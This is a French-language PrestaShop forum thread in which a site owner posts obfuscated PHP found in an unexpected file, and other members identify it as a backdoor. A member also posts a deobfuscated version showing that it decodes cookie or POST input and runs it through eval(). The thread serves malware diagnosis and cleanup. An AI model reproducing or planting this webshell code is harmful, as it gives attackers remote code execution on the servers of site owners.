yanoch_newbie Posted April 3, 2020 Share Posted April 3, 2020 Bonjour Voici le code que je trouve dans le fichier server_synchronize.php : Est ce que ça vous semble normal ? $h2bf1 = 851;$GLOBALS['r9418'] = Array();global $r9418;$r9418 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['r168d1'] = "\x39\x73\x3e\x76\x5e\x33\x37\x27\x61\x48\x4f\x29\x5f\x6e\x43\x2c\x45\x20\x25\x4e\x41\x6b\x65\xa\x4a\x23\x31\x34\x53\x42\x54\x6f\x44\x9\x22\x72\x5a\x66\x38\x7a\x3d\xd\x49\x3b\x47\x55\x6c\x35\x60\x3c\x52\x78\x62\x59\x46\x2b\x7d\x75\x2d\x51\x58\x67\x79\x50\x21\x5d\x68\x57\x7e\x36\x2a\x71\x69\x30\x3a\x64\x4c\x7b\x56\x74\x77\x5b\x6d\x7c\x26\x4b\x4d\x5c\x24\x6a\x70\x2f\x32\x63\x2e\x40\x28\x3f";$r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]] = $r9418['r168d1'][93].$r9418['r168d1'][66].$r9418['r168d1'][35];$r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]] = $r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]] = $r9418['r168d1'][1].$r9418['r168d1'][79].$r9418['r168d1'][35].$r9418['r168d1'][46].$r9418['r168d1'][22].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]] = 
$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]] = $r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][72].$r9418['r168d1'][12].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]] = $r9418['r168d1'][90].$r9418['r168d1'][66].$r9418['r168d1'][90].$r9418['r168d1'][3].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][1].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]] = $r9418['r168d1'][57].$r9418['r168d1'][13].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]] = 
$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][27].$r9418['r168d1'][12].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][31].$r9418['r168d1'][75].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][72].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]] = $r9418['r168d1'][39].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][5];$r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]] = $r9418['r168d1'][66].$r9418['r168d1'][0].$r9418['r168d1'][93].$r9418['r168d1'][8].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] = $_POST;$r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] = $_COOKIE;@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61], 
NULL);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][1], 0);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][82].$r9418['r168d1'][8].$r9418['r168d1'][51].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][51].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][57].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22], 0);@$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]](0);if 
(!$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8])){$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r
9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8], 1);$r6ea = NULL;$o16aa8 = NULL;$r9418[$r9418['r168d1'][79].$r9418['r168d1'][27].$r9418['r168d1'][6].$r9418['r168d1'][38]] = $r9418['r168d1'][75].$r9418['r168d1'][8].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][58].$r9418['r168d1'][27].$r9418['r168d1'][37].$r9418['r168d1'][0].$r9418['r168d1'][52].$r9418['r168d1'][58].$r9418['r168d1'][0].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][92].$r9418['r168d1'][58].$r9418['r168d1'][47].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][69].$r9418['r168d1'][38].$r9418['r168d1'][69].$r9418['r168d1'][26].$r9418['r168d1'][92].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][22].$r9418['r168d1'][92];global $t478;function h9cae($r6ea, $y53d39940){global $r9418;$w3d230 = "";for ($qefa1=0; $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea);){for ($c7d8b4=0; $c7d8b4<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($y53d39940) && $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea); $c7d8b4++, $qefa1++){$w3d230 .= $r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]]($r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($r6ea[$qefa1]) ^ 
$r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($y53d39940[$c7d8b4]));}}return $w3d230;}function z21ea3($r6ea, $y53d39940){global $r9418;global $t478;return $r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r6ea, $t478), $y53d39940);}foreach ($r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}if (!$r6ea){foreach ($r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}}$r6ea = @$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]]($r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]]($r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]]($r6ea), $o16aa8));if (isset($r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]) && $t478==$r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]){if ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][72]){$qefa1 = Array($r9418['r168d1'][90].$r9418['r168d1'][3] => @$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]](),$r9418['r168d1'][1].$r9418['r168d1'][3] => $r9418['r168d1'][26].$r9418['r168d1'][94].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][26],);echo @$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]]($qefa1);}elseif 
($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][22]){eval/*l3ba4*/($r6ea[$r9418['r168d1'][75]]);}exit();}} ?> Link to comment Share on other sites More sharing options...
Mediacom87 Posted April 3, 2020 Share Posted April 3, 2020 C'est quoi ce fichier déjà, à la base ???? Car il ne me semble pas exister dans l'archive de n'importe quelle version de PrestaShop. Donc poubelle si vous ne savez pas, et surtout il faut trouver comment il est arrivé là. Link to comment Share on other sites More sharing options...
yanoch_newbie Posted April 3, 2020 Author Share Posted April 3, 2020 (edited) Le fichier est dans le dossier phpMA qui est lui même à la racine du prestashop 1.4.7.2 Je peux simplement enlever le code suspect .....sinon Edited April 3, 2020 by yanoch_newbie (see edit history) Link to comment Share on other sites More sharing options...
Mediacom87 Posted April 3, 2020 Share Posted April 3, 2020 phpMA n'existe pas non plus, donc si vous ne savez pas, vous renommez ou vous effacez, mais tout cela pue grave. Link to comment Share on other sites More sharing options...
yanoch_newbie Posted April 3, 2020 Author Share Posted April 3, 2020 merci pour votre conseil je vais tester 😀 Link to comment Share on other sites More sharing options...
coeos.pro Posted April 3, 2020 Share Posted April 3, 2020 dans la dernière ligne il y a la fonction php eval, je vous laisse lire l'encadré jaune ici : https://www.php.net/manual/fr/function.eval.php Link to comment Share on other sites More sharing options...
yanoch_newbie Posted April 3, 2020 Author Share Posted April 3, 2020 effectivement ! Link to comment Share on other sites More sharing options...
coeos.pro Posted April 4, 2020 Share Posted April 4, 2020 Pour info, une fois "nettoyé" (c'est juste pour le rendre lisible et compréhensible) le code ressemble à : <?php @iniset(error_log, NULL); @iniset(log_errors, 0); @iniset(max_execution_time, 0); @settimelimit(0); if (!defined(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba)) { define(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba, 1); $r6ea = NULL; $o16aa8 = NULL; [t478] = da5b6e70-3ede-4f9b-93e2-51f6861295e2; global $t478; function h9cae($r6ea, $y53d39940) { global ; $w3d230 = ""; for ($qefa1=0; $qefa1<strlen($r6ea);) { for ($c7d8b4=0; $c7d8b4<strlen($y53d39940) && $qefa1<strlen($r6ea); $c7d8b4++, $qefa1++) { $w3d230 = chr(ord($r6ea[$qefa1]) ^ ord($y53d39940[$c7d8b4])); } } return $w3d230; } function z21ea3($r6ea, $y53d39940) { global ; global $t478; return h9cae(h9cae($r6ea, $t478), $y53d39940); } foreach ($_COOKIE as $y53d39940=>$f9f33e70a) { $r6ea = $f9f33e70a; $o16aa8 = $y53d39940; } if (!$r6ea) { foreach ($_POST as $y53d39940=>$f9f33e70a) { $r6ea = $f9f33e70a; $o16aa8 = $y53d39940; } } $r6ea = @unserialize(z21ea3(base64decode($r6ea), $o16aa8)); if (isset($r6ea[ak]) && $t478==$r6ea[ak]) { if ($r6ea[a] == i) { $qefa1 = Array(pv => @phpversion(),sv => 10-1,); echo @serialize($qefa1); } elseif ($r6ea[a] == e) { eval/*l3ba4*/($r6ea[d]); } exit(); } } En clair, il lit une valeur dans un cookie (ou à défaut en POST), la décode, et si la clé correspond il exécute via eval() le PHP reçu : c'est une porte dérobée. Donc, si dans un module ou un autre fichier tu retrouves un code totalement illisible, tu sauras qu'il y a un lien. Link to comment Share on other sites More sharing options...